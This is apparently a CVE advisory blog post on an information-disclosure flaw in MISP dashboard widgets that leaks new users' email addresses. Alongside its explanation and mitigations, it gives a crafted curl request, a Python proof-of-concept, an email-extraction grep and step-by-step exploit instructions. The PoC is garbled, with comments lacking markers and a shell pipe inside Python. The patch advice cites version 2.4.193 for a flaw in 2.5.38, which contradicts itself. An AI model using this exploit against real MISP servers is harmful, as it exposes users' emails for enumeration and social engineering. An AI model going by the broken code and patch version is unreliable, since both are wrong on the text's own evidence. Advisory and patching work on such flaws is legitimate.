Listen to this Post
Technical Deep Dive: How CVE-2026-10864 Works
CVE-2026-10864 is an information disclosure vulnerability present in the MISP (Malware Information Sharing Platform) dashboard, specifically within the “New Users” and “New Organisations” widgets. The core of the issue lies in how the application handles user-supplied `fields` parameters when fetching data for these widgets.
An authenticated attacker with low privileges can manipulate the `fields` option in the API request to the dashboard. The vulnerability occurs because the system applies field filtering and redaction (removing restricted fields like email addresses) after it has parsed the user’s request. If a non-site-admin user requests a set of fields that, after the system applies its security redaction, results in an empty field list, the underlying database query enters a fallback state.
In this fallback state, instead of returning nothing or an error, the MISP backend incorrectly defaults to returning a set of unintended model fields from the database. For the “New Users” widget, this fallback can leak the `email` field of newly created user accounts, even if the global configuration setting `MISP.email_disabled` is turned on to prevent such disclosure. Similarly, the “New Organisations” widget can be manipulated to leak sensitive internal organisation metadata that should not be visible to a low-privileged user.
The root cause is a classic case of flawed input validation and an insecure state transition (CWE-20). The developers applied security measures like redaction post-validation, which creates a scenario where a “valid” user input becomes “invalid” after processing, leading to an unhandled logic path. The fix implements a safe construction of the allowed field list, ensures restricted fields are stripped before processing user input, and explicitly defines a safe fallback to only permitted default fields when a request results in an empty selection.
The vulnerability is exploitable over the network (AV:N) with low attack complexity (AC:L) and requires low-privileged user authentication (PR:L). It has a CVSS v4 base score of 5.3 (MEDIUM).
DailyCVE Form:
Platform: MISP
Version: 2.5.38
Vulnerability : Info Disclosure
Severity: Medium
date: 2026-06-04
Prediction: 2026-06-18
What Undercode Say:
Undercode recommends the following commands to check for vulnerable MISP versions and to test for the vulnerability.
1. Check MISP Version:
Log into the MISP server and run: cat /var/www/MISP/app/Config/version.php | grep -E "version|release"
2. Test Vulnerability via cURL:
This command sends a crafted request to the `dashboard/widgets` endpoint, manipulating the `fields` parameter to attempt to leak email addresses.
curl -X GET 'https://<MISP-URL>/dashboard/widgets/NewUsersWidget/getData' \
-H 'Authorization: Bearer <YOUR_API_KEY>' \
-H 'Content-Type: application/json' \
-d '{"params":{"fields":["restricted_field_that_gets_redacted","another_fake_field"]}}'
3. Python Proof-of-Concept (PoC) Script:
import requests
import json
url = "https://<MISP-URL>/dashboard/widgets/NewUsersWidget/getData"
headers = {"Authorization": "Bearer <YOUR_API_KEY>", "Content-Type": "application/json"}
Request a field that will be redacted, forcing an empty selection
payload = {"params": {"fields": ["non_existent_field"]}}
response = requests.get(url, headers=headers, json=payload)
if response.status_code == 200:
If email addresses are in the response, the system is vulnerable
if "email" in response.text:
print("[!] VULNERABLE: Email addresses leaked.")
Extract emails using jq or grep
print(json.dumps(response.json(), indent=2) | grep -E '"email":')
4. Grep for Leaked Emails:
After a successful exploit, filter the output for email patterns.
curl -s ... | grep -oE '([a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+.[a-zA-Z]{2,})'
Exploit:
An attacker must have a valid low-privileged MISP user account. They then access the dashboard and intercept the request to either the `NewUsersWidget` or NewOrganisationsWidget. The attacker modifies the `fields` parameter in the JSON payload to include a non-existent or redacted field (e.g., email). When the MISP backend redacts all requested fields as invalid, it triggers the vulnerable fallback, which returns the default model fields, including the sensitive `email` column for the user widget. The attacker can then extract these emails from the API response.
Protection:
Immediate Action: Upgrade MISP to a patched version (2.4.193 or higher, as per the advisory for related issues, or the specific version containing the fix for this CVE).
Mitigation: If an immediate upgrade is not possible, disable the “New Users” and “New Organisations” dashboard widgets for all non-admin users via the MISP role/permissions settings.
Network Segmentation: Restrict access to the MISP dashboard API endpoints to trusted IP addresses only.
Impact:
An authenticated, low-privileged user (e.g., an analyst) can view the email addresses of all newly created users and potentially other sensitive internal organisation metadata. This violates the principle of least privilege and can be used for further social engineering attacks, account enumeration, or as a stepping stone for more complex attacks on the MISP instance or its users.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
